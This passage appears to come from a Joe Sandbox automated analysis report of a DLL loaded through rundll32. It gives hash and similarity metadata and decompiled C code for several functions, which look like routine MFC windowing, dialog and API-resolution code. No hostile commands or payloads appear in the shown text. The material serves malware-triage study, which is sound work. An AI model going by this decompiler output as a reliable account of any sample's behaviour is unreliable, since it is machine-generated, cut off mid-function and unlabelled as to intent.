                                                                                                        • Associated: 00000003.00000002.304109553.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304121863.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                        • String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                                                                                        • API String ID: 667068680-68207542
                                                                                                        • Opcode ID: ee0e5f062bbe94e4a9e7c06d78520802f13055058268d31d10b74b4948bb3027
                                                                                                        • Instruction ID: 93615fb53cb164fe7f3d347b700eade87a81924dee4312457033af375ccc55a3
                                                                                                        • Opcode Fuzzy Hash: ee0e5f062bbe94e4a9e7c06d78520802f13055058268d31d10b74b4948bb3027
                                                                                                        • Instruction Fuzzy Hash: 7921E3B19097699BE701EF369DC856DBAF5F34F281391453FE109D2528EB3884C6EE20
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 89%
                                                                                                        			E1000F530(void* __ebx, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
                                                                                                        				signed int _v8;
                                                                                                        				intOrPtr _v12;
                                                                                                        				struct tagRECT _v28;
                                                                                                        				struct tagRECT _v44;
                                                                                                        				struct tagRECT _v60;
                                                                                                        				struct tagRECT _v80;
                                                                                                        				char _v100;
                                                                                                        				void* __edi;
                                                                                                        				intOrPtr _t58;
                                                                                                        				struct HWND__* _t59;
                                                                                                        				intOrPtr _t94;
                                                                                                        				signed int _t103;
                                                                                                        				struct HWND__* _t104;
                                                                                                        				void* _t105;
                                                                                                        				struct HWND__* _t107;
                                                                                                        				long _t108;
                                                                                                        				long _t116;
                                                                                                        				void* _t119;
                                                                                                        				struct HWND__* _t121;
                                                                                                        				void* _t123;
                                                                                                        				intOrPtr _t125;
                                                                                                        				intOrPtr _t129;
                                                                                                        
                                                                                                        				_t119 = __edx;
                                                                                                        				_t105 = __ebx;
                                                                                                        				_t125 = __ecx;
                                                                                                        				_v12 = __ecx;
                                                                                                        				_v8 = E10012862(__ecx);
                                                                                                        				_t58 = _a4;
                                                                                                        				if(_t58 == 0) {
                                                                                                        					if((_v8 & 0x40000000) == 0) {
                                                                                                        						_t59 = GetWindow( *(__ecx + 0x20), 4);
                                                                                                        					} else {
                                                                                                        						_t59 = GetParent( *(__ecx + 0x20));
                                                                                                        					}
                                                                                                        					_t121 = _t59;
                                                                                                        					if(_t121 != 0) {
                                                                                                        						_t104 = SendMessageA(_t121, 0x36b, 0, 0);
                                                                                                        						if(_t104 != 0) {
                                                                                                        							_t121 = _t104;
                                                                                                        						}
                                                                                                        					}
                                                                                                        				} else {
                                                                                                        					_t4 = _t58 + 0x20; // 0xc033d88b
                                                                                                        					_t121 =  *_t4;
                                                                                                        				}
                                                                                                        				_push(_t105);
                                                                                                        				GetWindowRect( *(_t125 + 0x20),  &_v60);
                                                                                                        				if((_v8 & 0x40000000) != 0) {
                                                                                                        					_t107 = GetParent( *(_t125 + 0x20));
                                                                                                        					GetClientRect(_t107,  &_v28);
                                                                                                        					GetClientRect(_t121,  &_v44);
                                                                                                        					MapWindowPoints(_t121, _t107,  &_v44, 2);
                                                                                                        				} else {
                                                                                                        					if(_t121 != 0) {
                                                                                                        						_t103 = GetWindowLongA(_t121, 0xfffffff0);
                                                                                                        						if((_t103 & 0x10000000) == 0 || (_t103 & 0x20000000) != 0) {
                                                                                                        							_t121 = 0;
                                                                                                        						}
                                                                                                        					}
                                                                                                        					_v100 = 0x28;
                                                                                                        					if(_t121 != 0) {
                                                                                                        						GetWindowRect(_t121,  &_v44);
                                                                                                        						E1000D86F(_t121, E1000D804(_t121, 2),  &_v100);
                                                                                                        						CopyRect( &_v28,  &_v80);
                                                                                                        					} else {
                                                                                                        						_t94 = E1000A7CE();
                                                                                                        						if(_t94 != 0) {
                                                                                                        							_t94 =  *((intOrPtr*)(_t94 + 0x20));
                                                                                                        						}
                                                                                                        						E1000D86F(_t121, E1000D804(_t94, 1),  &_v100);
                                                                                                        						CopyRect( &_v44,  &_v80);
                                                                                                        						CopyRect( &_v28,  &_v80);
                                                                                                        					}
                                                                                                        				}
                                                                                                        				_t108 = _v60.left;
                                                                                                        				asm("cdq");
                                                                                                        				_t123 = _v60.right - _t108;
                                                                                                        				asm("cdq");
                                                                                                        				_t120 = _v44.bottom;
                                                                                                        				_t116 = (_v44.left + _v44.right - _t119 >> 1) - (_t123 - _t119 >> 1);
                                                                                                        				_a4 = _v60.bottom - _v60.top;
                                                                                                        				asm("cdq");
                                                                                                        				asm("cdq");
                                                                                                        				_t129 = (_v44.top + _v44.bottom - _v44.bottom >> 1) - (_a4 - _t120 >> 1);
                                                                                                        				if(_t116 >= _v28.left) {
                                                                                                        					if(_t123 + _t116 > _v28.right) {
                                                                                                        						_t116 = _t108 - _v60.right + _v28.right;
                                                                                                        					}
                                                                                                        				} else {
                                                                                                        					_t116 = _v28.left;
                                                                                                        				}
                                                                                                        				if(_t129 >= _v28.top) {
                                                                                                        					if(_a4 + _t129 > _v28.bottom) {
                                                                                                        						_t129 = _v60.top - _v60.bottom + _v28.bottom;
                                                                                                        					}
                                                                                                        				} else {
                                                                                                        					_t129 = _v28.top;
                                                                                                        				}
                                                                                                        				return E1001297A(_v12, 0, _t116, _t129, 0xffffffff, 0xffffffff, 0x15);
                                                                                                        			}

























                                                                                                        0x1000f530
                                                                                                        0x1000f530
                                                                                                        0x1000f537
                                                                                                        0x1000f53a
                                                                                                        0x1000f542
                                                                                                        0x1000f545
                                                                                                        0x1000f54a
                                                                                                        0x1000f558
                                                                                                        0x1000f56a
                                                                                                        0x1000f55a
                                                                                                        0x1000f55d
                                                                                                        0x1000f55d
                                                                                                        0x1000f570
                                                                                                        0x1000f574
                                                                                                        0x1000f580
                                                                                                        0x1000f588
                                                                                                        0x1000f58a
                                                                                                        0x1000f58a
                                                                                                        0x1000f588
                                                                                                        0x1000f54c
                                                                                                        0x1000f54c
                                                                                                        0x1000f54c
                                                                                                        0x1000f54c
                                                                                                        0x1000f58c
                                                                                                        0x1000f59a
                                                                                                        0x1000f5a3
                                                                                                        0x1000f643
                                                                                                        0x1000f64a
                                                                                                        0x1000f651
                                                                                                        0x1000f65b
                                                                                                        0x1000f5a9
                                                                                                        0x1000f5ab
                                                                                                        0x1000f5b0
                                                                                                        0x1000f5bb
                                                                                                        0x1000f5c4
                                                                                                        0x1000f5c4
                                                                                                        0x1000f5bb
                                                                                                        0x1000f5c8
                                                                                                        0x1000f5cf
                                                                                                        0x1000f610
                                                                                                        0x1000f61f
                                                                                                        0x1000f62c
                                                                                                        0x1000f5d1
                                                                                                        0x1000f5d1
                                                                                                        0x1000f5d8
                                                                                                        0x1000f5da
                                                                                                        0x1000f5da
                                                                                                        0x1000f5ea
                                                                                                        0x1000f5fd
                                                                                                        0x1000f607
                                                                                                        0x1000f607
                                                                                                        0x1000f5cf
                                                                                                        0x1000f66a
                                                                                                        0x1000f66f
                                                                                                        0x1000f674
                                                                                                        0x1000f678
                                                                                                        0x1000f67b
                                                                                                        0x1000f682
                                                                                                        0x1000f68a
                                                                                                        0x1000f692
                                                                                                        0x1000f69a
                                                                                                        0x1000f6a1
                                                                                                        0x1000f6a6
                                                                                                        0x1000f6b2
                                                                                                        0x1000f6ba
                                                                                                        0x1000f6ba
                                                                                                        0x1000f6a8
                                                                                                        0x1000f6a8
                                                                                                        0x1000f6a8
                                                                                                        0x1000f6c0
                                                                                                        0x1000f6cf
                                                                                                        0x1000f6d7
                                                                                                        0x1000f6d7
                                                                                                        0x1000f6c2
                                                                                                        0x1000f6c2
                                                                                                        0x1000f6c2
                                                                                                        0x1000f6ef

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.304032421.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.304028331.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304060636.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304077938.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304103291.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304109553.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304121863.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Rect$Window$Copy$Long$MessageParentSend
                                                                                                        • String ID: (
                                                                                                        • API String ID: 808654186-3887548279
                                                                                                        • Opcode ID: 7a74a446788f1e642fa1c3aef1600eb5c5d71207166799e974e91dfaab450861
                                                                                                        • Instruction ID: 3f3129d87232bc90929dbfd76231b55f7e5f3d8dd267dcccc126c4261812b80e
                                                                                                        • Opcode Fuzzy Hash: 7a74a446788f1e642fa1c3aef1600eb5c5d71207166799e974e91dfaab450861
                                                                                                        • Instruction Fuzzy Hash: 84517072900619AFEB00DFA8CC85EEEBBB9EF48290F154119FA05F3594DB30ED419B60
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E1000A1F9(intOrPtr* __ecx, void* __esi, intOrPtr _a4) {
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				void* __ebp;
                                                                                                        				_Unknown_base(*)()* _t9;
                                                                                                        				struct HINSTANCE__* _t15;
                                                                                                        				void* _t16;
                                                                                                        				intOrPtr* _t18;
                                                                                                        				char _t19;
                                                                                                        				intOrPtr _t21;
                                                                                                        				_Unknown_base(*)()* _t22;
                                                                                                        				_Unknown_base(*)()* _t23;
                                                                                                        
                                                                                                        				_t16 = __esi;
                                                                                                        				_t12 = __ecx;
                                                                                                        				_t18 = __ecx;
                                                                                                        				 *__ecx = _a4;
                                                                                                        				_a4 = 0;
                                                                                                        				_t19 =  *0x10058f2c; // 0x0
                                                                                                        				if(_t19 == 0) {
                                                                                                        					_t15 = GetModuleHandleA("KERNEL32");
                                                                                                        					_t20 = _t15;
                                                                                                        					if(_t15 == 0) {
                                                                                                        						L2:
                                                                                                        						E1000A0DB(0, _t12, _t15, _t16, _t20);
                                                                                                        					}
                                                                                                        					 *0x10058f1c = GetProcAddress(_t15, "CreateActCtxA");
                                                                                                        					 *0x10058f20 = GetProcAddress(_t15, "ReleaseActCtx");
                                                                                                        					 *0x10058f24 = GetProcAddress(_t15, "ActivateActCtx");
                                                                                                        					_t9 = GetProcAddress(_t15, "DeactivateActCtx");
                                                                                                        					_t21 =  *0x10058f1c; // 0x0
                                                                                                        					 *0x10058f28 = _t9;
                                                                                                        					_t16 = _t16;
                                                                                                        					if(_t21 == 0) {
                                                                                                        						__eflags =  *0x10058f20; // 0x0
                                                                                                        						if(__eflags != 0) {
                                                                                                        							goto L2;
                                                                                                        						} else {
                                                                                                        							__eflags =  *0x10058f24; // 0x0
                                                                                                        							if(__eflags != 0) {
                                                                                                        								goto L2;
                                                                                                        							} else {
                                                                                                        								__eflags = _t9;
                                                                                                        								if(__eflags != 0) {
                                                                                                        									goto L2;
                                                                                                        								}
                                                                                                        							}
                                                                                                        						}
                                                                                                        					} else {
                                                                                                        						_t22 =  *0x10058f20; // 0x0
                                                                                                        						if(_t22 == 0) {
                                                                                                        							goto L2;
                                                                                                        						} else {
                                                                                                        							_t23 =  *0x10058f24; // 0x0
                                                                                                        							if(_t23 == 0) {
                                                                                                        								goto L2;
                                                                                                        							} else {
                                                                                                        								_t20 = _t9;
                                                                                                        								if(_t9 == 0) {
                                                                                                        									goto L2;
                                                                                                        								}
                                                                                                        							}
                                                                                                        						}
                                                                                                        					}
                                                                                                        					 *0x10058f2c = 1;
                                                                                                        				}
                                                                                                        				return _t18;
                                                                                                        			}














                                                                                                        0x1000a1f9
                                                                                                        0x1000a1f9
                                                                                                        0x1000a1ff
                                                                                                        0x1000a203
                                                                                                        0x1000a206
                                                                                                        0x1000a209
                                                                                                        0x1000a210
                                                                                                        0x1000a221
                                                                                                        0x1000a223
                                                                                                        0x1000a225
                                                                                                        0x1000a227
                                                                                                        0x1000a227
                                                                                                        0x1000a227
                                                                                                        0x1000a241
                                                                                                        0x1000a24e
                                                                                                        0x1000a25b
                                                                                                        0x1000a260
                                                                                                        0x1000a262
                                                                                                        0x1000a268
                                                                                                        0x1000a26d
                                                                                                        0x1000a26e
                                                                                                        0x1000a286
                                                                                                        0x1000a28c
                                                                                                        0x00000000
                                                                                                        0x1000a28e
                                                                                                        0x1000a28e
                                                                                                        0x1000a294
                                                                                                        0x00000000
                                                                                                        0x1000a296
                                                                                                        0x1000a296
                                                                                                        0x1000a298
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000a298
                                                                                                        0x1000a294
                                                                                                        0x1000a270
                                                                                                        0x1000a270
                                                                                                        0x1000a276
                                                                                                        0x00000000
                                                                                                        0x1000a278
                                                                                                        0x1000a278
                                                                                                        0x1000a27e
                                                                                                        0x00000000
                                                                                                        0x1000a280
                                                                                                        0x1000a280
                                                                                                        0x1000a282
                                                                                                        0x00000000
                                                                                                        0x1000a284
                                                                                                        0x1000a282
                                                                                                        0x1000a27e
                                                                                                        0x1000a276
                                                                                                        0x1000a29a
                                                                                                        0x1000a29a
                                                                                                        0x1000a2a6

                                                                                                        APIs
                                                                                                        • GetModuleHandleA.KERNEL32(KERNEL32,00000000,?,00000020,1000ACB1,000000FF), ref: 1000A21B
                                                                                                        • GetProcAddress.KERNEL32(00000000,CreateActCtxA), ref: 1000A239
                                                                                                        • GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 1000A246
                                                                                                        • GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 1000A253
                                                                                                        • GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 1000A260
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.304032421.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.304028331.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304060636.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304077938.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304103291.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304109553.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304121863.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                        • String ID: ActivateActCtx$CreateActCtxA$DeactivateActCtx$KERNEL32$ReleaseActCtx
                                                                                                        • API String ID: 667068680-3617302793
                                                                                                        • Opcode ID: 8958f846425cfb9847c1ef030b437731261e480fa3a980f3a7b160ae38ca1aab
                                                                                                        • Instruction ID: c20c66116e7296d4a0afd5037f2dffc74684b1862cb446d2da729e570b87d5d5
                                                                                                        • Opcode Fuzzy Hash: 8958f846425cfb9847c1ef030b437731261e480fa3a980f3a7b160ae38ca1aab
                                                                                                        • Instruction Fuzzy Hash: 3611C076C04266EBFB10DFA9ACC45097BE5E74F2D8301423FEA05A2124D7720980CF15
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 94%
                                                                                                        			E1000CB74(void* __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                        				signed int _t54;
                                                                                                        				void* _t58;
                                                                                                        				signed int _t59;
                                                                                                        				signed int _t63;
                                                                                                        				signed short _t71;
                                                                                                        				signed int _t84;
                                                                                                        				void* _t94;
                                                                                                        				struct HINSTANCE__* _t96;
                                                                                                        				signed int _t97;
                                                                                                        				void* _t98;
                                                                                                        				signed int _t100;
                                                                                                        				void* _t101;
                                                                                                        				void* _t102;
                                                                                                        
                                                                                                        				_t102 = __eflags;
                                                                                                        				_t94 = __edx;
                                                                                                        				_push(0x24);
                                                                                                        				E10017BF4(E10028029, __ebx, __edi, __esi);
                                                                                                        				_t100 = __ecx;
                                                                                                        				 *((intOrPtr*)(_t101 - 0x20)) = __ecx;
                                                                                                        				 *(_t101 - 0x1c) =  *(__ecx + 0x60);
                                                                                                        				 *(_t101 - 0x18) =  *(__ecx + 0x5c);
                                                                                                        				_t54 = E1000D5EC(__ebx, __edi, __ecx, _t102);
                                                                                                        				_t96 =  *(_t54 + 0xc);
                                                                                                        				_t84 = 0;
                                                                                                        				_t103 =  *(_t100 + 0x58);
                                                                                                        				if( *(_t100 + 0x58) != 0) {
                                                                                                        					_t96 =  *(E1000D5EC(0, _t96, _t100, _t103) + 0xc);
                                                                                                        					_t54 = LoadResource(_t96, FindResourceA(_t96,  *(_t100 + 0x58), 5));
                                                                                                        					 *(_t101 - 0x18) = _t54;
                                                                                                        				}
                                                                                                        				if( *(_t101 - 0x18) != _t84) {
                                                                                                        					_t54 = LockResource( *(_t101 - 0x18));
                                                                                                        					 *(_t101 - 0x1c) = _t54;
                                                                                                        				}
                                                                                                        				if( *(_t101 - 0x1c) != _t84) {
                                                                                                        					_t86 = _t100;
                                                                                                        					 *(_t101 - 0x14) = E1000C6AC(_t84, _t100, __eflags);
                                                                                                        					E1000FC04(_t84, _t96, __eflags);
                                                                                                        					 *(_t101 - 0x28) =  *(_t101 - 0x28) & _t84;
                                                                                                        					__eflags =  *(_t101 - 0x14) - _t84;
                                                                                                        					 *(_t101 - 0x2c) = _t84;
                                                                                                        					 *(_t101 - 0x24) = _t84;
                                                                                                        					if(__eflags != 0) {
                                                                                                        						__eflags =  *(_t101 - 0x14) - GetDesktopWindow();
                                                                                                        						if(__eflags != 0) {
                                                                                                        							__eflags = IsWindowEnabled( *(_t101 - 0x14));
                                                                                                        							if(__eflags != 0) {
                                                                                                        								EnableWindow( *(_t101 - 0x14), 0);
                                                                                                        								 *(_t101 - 0x2c) = 1;
                                                                                                        								_t84 = E1000A7CE();
                                                                                                        								__eflags = _t84;
                                                                                                        								 *(_t101 - 0x24) = _t84;
                                                                                                        								if(__eflags != 0) {
                                                                                                        									_t86 = _t84;
                                                                                                        									__eflags =  *((intOrPtr*)( *_t84 + 0x120))();
                                                                                                        									if(__eflags != 0) {
                                                                                                        										_t86 = _t84;
                                                                                                        										__eflags = E100128F8(_t84);
                                                                                                        										if(__eflags != 0) {
                                                                                                        											_t86 = _t84;
                                                                                                        											E10012913(_t84, 0);
                                                                                                        											 *(_t101 - 0x28) = 1;
                                                                                                        										}
                                                                                                        									}
                                                                                                        								}
                                                                                                        							}
                                                                                                        						}
                                                                                                        					}
                                                                                                        					 *(_t101 - 4) =  *(_t101 - 4) & 0x00000000;
                                                                                                        					E100115DC(_t96, __eflags, _t100);
                                                                                                        					_t58 = E1000FB5C(_t84, _t86, _t101,  *(_t101 - 0x14));
                                                                                                        					_push(_t96);
                                                                                                        					_push(_t58);
                                                                                                        					_push( *(_t101 - 0x1c));
                                                                                                        					_t59 = E1000C984(_t84, _t100, _t94, _t96, _t100, __eflags);
                                                                                                        					_t97 = 0;
                                                                                                        					__eflags = _t59;
                                                                                                        					if(_t59 != 0) {
                                                                                                        						__eflags =  *(_t100 + 0x3c) & 0x00000010;
                                                                                                        						if(( *(_t100 + 0x3c) & 0x00000010) != 0) {
                                                                                                        							_t98 = 4;
                                                                                                        							_t71 = E10012862(_t100);
                                                                                                        							__eflags = _t71 & 0x00000100;
                                                                                                        							if((_t71 & 0x00000100) != 0) {
                                                                                                        								_t98 = 5;
                                                                                                        							}
                                                                                                        							E1000F6F2(_t100, _t98);
                                                                                                        							_t97 = 0;
                                                                                                        							__eflags = 0;
                                                                                                        						}
                                                                                                        						__eflags =  *((intOrPtr*)(_t100 + 0x20)) - _t97;
                                                                                                        						if( *((intOrPtr*)(_t100 + 0x20)) != _t97) {
                                                                                                        							E1001297A(_t100, _t97, _t97, _t97, _t97, _t97, 0x97);
                                                                                                        						}
                                                                                                        					}
                                                                                                        					 *(_t101 - 4) =  *(_t101 - 4) | 0xffffffff;
                                                                                                        					__eflags =  *(_t101 - 0x28) - _t97;
                                                                                                        					if( *(_t101 - 0x28) != _t97) {
                                                                                                        						E10012913(_t84, 1);
                                                                                                        					}
                                                                                                        					__eflags =  *(_t101 - 0x2c) - _t97;
                                                                                                        					if( *(_t101 - 0x2c) != _t97) {
                                                                                                        						EnableWindow( *(_t101 - 0x14), 1);
                                                                                                        					}
                                                                                                        					__eflags =  *(_t101 - 0x14) - _t97;
                                                                                                        					if(__eflags != 0) {
                                                                                                        						__eflags = GetActiveWindow() -  *((intOrPtr*)(_t100 + 0x20));
                                                                                                        						if(__eflags == 0) {
                                                                                                        							SetActiveWindow( *(_t101 - 0x14));
                                                                                                        						}
                                                                                                        					}
                                                                                                        					 *((intOrPtr*)( *_t100 + 0x60))();
                                                                                                        					E1000C6E6(_t84, _t100, _t97, _t100, __eflags);
                                                                                                        					__eflags =  *(_t100 + 0x58) - _t97;
                                                                                                        					if( *(_t100 + 0x58) != _t97) {
                                                                                                        						FreeResource( *(_t101 - 0x18));
                                                                                                        					}
                                                                                                        					_t63 =  *(_t100 + 0x44);
                                                                                                        					goto L31;
                                                                                                        				} else {
                                                                                                        					_t63 = _t54 | 0xffffffff;
                                                                                                        					L31:
                                                                                                        					return E10017C60(_t63);
                                                                                                        				}
                                                                                                        			}
















                                                                                                        0x1000cb74
                                                                                                        0x1000cb74
                                                                                                        0x1000cb74
                                                                                                        0x1000cb7b
                                                                                                        0x1000cb80
                                                                                                        0x1000cb82
                                                                                                        0x1000cb88
                                                                                                        0x1000cb8e
                                                                                                        0x1000cb91
                                                                                                        0x1000cb96
                                                                                                        0x1000cb99
                                                                                                        0x1000cb9b
                                                                                                        0x1000cb9e
                                                                                                        0x1000cba5
                                                                                                        0x1000cbb6
                                                                                                        0x1000cbbc
                                                                                                        0x1000cbbc
                                                                                                        0x1000cbc2
                                                                                                        0x1000cbc7
                                                                                                        0x1000cbcd
                                                                                                        0x1000cbcd
                                                                                                        0x1000cbd3
                                                                                                        0x1000cbdd
                                                                                                        0x1000cbe4
                                                                                                        0x1000cbe7
                                                                                                        0x1000cbec
                                                                                                        0x1000cbef
                                                                                                        0x1000cbf2
                                                                                                        0x1000cbf5
                                                                                                        0x1000cbf8
                                                                                                        0x1000cc00
                                                                                                        0x1000cc03
                                                                                                        0x1000cc0e
                                                                                                        0x1000cc10
                                                                                                        0x1000cc17
                                                                                                        0x1000cc1d
                                                                                                        0x1000cc29
                                                                                                        0x1000cc2b
                                                                                                        0x1000cc2d
                                                                                                        0x1000cc30
                                                                                                        0x1000cc34
                                                                                                        0x1000cc3c
                                                                                                        0x1000cc3e
                                                                                                        0x1000cc40
                                                                                                        0x1000cc47
                                                                                                        0x1000cc49
                                                                                                        0x1000cc4d
                                                                                                        0x1000cc4f
                                                                                                        0x1000cc54
                                                                                                        0x1000cc54
                                                                                                        0x1000cc49
                                                                                                        0x1000cc3e
                                                                                                        0x1000cc30
                                                                                                        0x1000cc10
                                                                                                        0x1000cc03
                                                                                                        0x1000cc5b
                                                                                                        0x1000cc60
                                                                                                        0x1000cc68
                                                                                                        0x1000cc6d
                                                                                                        0x1000cc6e
                                                                                                        0x1000cc6f
                                                                                                        0x1000cc74
                                                                                                        0x1000cc79
                                                                                                        0x1000cc7b
                                                                                                        0x1000cc7d
                                                                                                        0x1000cc7f
                                                                                                        0x1000cc83
                                                                                                        0x1000cc87
                                                                                                        0x1000cc8a
                                                                                                        0x1000cc8f
                                                                                                        0x1000cc93
                                                                                                        0x1000cc97
                                                                                                        0x1000cc97
                                                                                                        0x1000cc9b
                                                                                                        0x1000cca0
                                                                                                        0x1000cca0
                                                                                                        0x1000cca0
                                                                                                        0x1000cca2
                                                                                                        0x1000cca5
                                                                                                        0x1000ccb3
                                                                                                        0x1000ccb3
                                                                                                        0x1000cca5
                                                                                                        0x1000ccb8
                                                                                                        0x1000ccdb
                                                                                                        0x1000ccde
                                                                                                        0x1000cce4
                                                                                                        0x1000cce4
                                                                                                        0x1000cce9
                                                                                                        0x1000ccec
                                                                                                        0x1000ccf3
                                                                                                        0x1000ccf3
                                                                                                        0x1000ccf9
                                                                                                        0x1000ccfc
                                                                                                        0x1000cd04
                                                                                                        0x1000cd07
                                                                                                        0x1000cd0c
                                                                                                        0x1000cd0c
                                                                                                        0x1000cd07
                                                                                                        0x1000cd16
                                                                                                        0x1000cd1b
                                                                                                        0x1000cd20
                                                                                                        0x1000cd23
                                                                                                        0x1000cd28
                                                                                                        0x1000cd28
                                                                                                        0x1000cd2e
                                                                                                        0x00000000
                                                                                                        0x1000cbd5
                                                                                                        0x1000cbd5
                                                                                                        0x1000cd31
                                                                                                        0x1000cd36
                                                                                                        0x1000cd36

                                                                                                        APIs
                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 1000CB7B
                                                                                                        • FindResourceA.KERNEL32(?,?,00000005), ref: 1000CBAE
                                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 1000CBB6
                                                                                                        • LockResource.KERNEL32(?,00000024,100014EC,00000000,EF7D8B91), ref: 1000CBC7
                                                                                                        • GetDesktopWindow.USER32 ref: 1000CBFA
                                                                                                        • IsWindowEnabled.USER32(?), ref: 1000CC08
                                                                                                        • EnableWindow.USER32(?,00000000), ref: 1000CC17
                                                                                                          • Part of subcall function 100128F8: IsWindowEnabled.USER32(?), ref: 10012901
                                                                                                          • Part of subcall function 10012913: EnableWindow.USER32(?,EF7D8B91), ref: 10012920
                                                                                                        • EnableWindow.USER32(?,00000001), ref: 1000CCF3
                                                                                                        • GetActiveWindow.USER32 ref: 1000CCFE
                                                                                                        • SetActiveWindow.USER32(?,?,00000024,100014EC,00000000,EF7D8B91), ref: 1000CD0C
                                                                                                        • FreeResource.KERNEL32(?,?,00000024,100014EC,00000000,EF7D8B91), ref: 1000CD28
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.304032421.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.304028331.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304060636.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304077938.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304103291.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304109553.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304121863.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchLoadLock
                                                                                                        • String ID:
                                                                                                        • API String ID: 1509511306-0
                                                                                                        • Opcode ID: 79ae930f89578103c1460a1015ac81056dc0f6867cd803f5cb3b8be9090631d6
                                                                                                        • Instruction ID: 8f78f448105f665873ac1cd7b5fa33a3343bcf420d8a1ae80c8a79bff85a7528
                                                                                                        • Opcode Fuzzy Hash: 79ae930f89578103c1460a1015ac81056dc0f6867cd803f5cb3b8be9090631d6
                                                                                                        • Instruction Fuzzy Hash: A251BF34A007098BFF11DFA5C999EAEBBF1EF44781F20002EE506A6195CB759E41CF55
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 96%
                                                                                                        			E10011245(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                        				_Unknown_base(*)()* _t31;
                                                                                                        				void* _t33;
                                                                                                        				void* _t34;
                                                                                                        				void* _t40;
                                                                                                        				void* _t43;
                                                                                                        				void* _t60;
                                                                                                        				void* _t64;
                                                                                                        				struct HWND__* _t66;
                                                                                                        				CHAR* _t68;
                                                                                                        				void* _t71;
                                                                                                        
                                                                                                        				_t64 = __edx;
                                                                                                        				_t60 = __ecx;
                                                                                                        				_push(0x40);
                                                                                                        				E10017BF4(E1002864B, __ebx, __edi, __esi);
                                                                                                        				_t66 =  *(_t71 + 8);
                                                                                                        				_t68 = "AfxOldWndProc423";
                                                                                                        				_t31 = GetPropA(_t66, _t68);
                                                                                                        				 *(_t71 - 0x14) =  *(_t71 - 0x14) & 0x00000000;
                                                                                                        				 *(_t71 - 4) =  *(_t71 - 4) & 0x00000000;
                                                                                                        				 *(_t71 - 0x18) = _t31;
                                                                                                        				_t58 = 1;
                                                                                                        				_t33 =  *(_t71 + 0xc) - 6;
                                                                                                        				if(_t33 == 0) {
                                                                                                        					_t34 = E1000FB5C(1, _t60, _t71,  *(_t71 + 0x14));
                                                                                                        					E10011159(_t60, E1000FB5C(1, _t60, _t71, _t66),  *(_t71 + 0x10), _t34);
                                                                                                        					goto L9;
                                                                                                        				} else {
                                                                                                        					_t40 = _t33 - 0x1a;
                                                                                                        					if(_t40 == 0) {
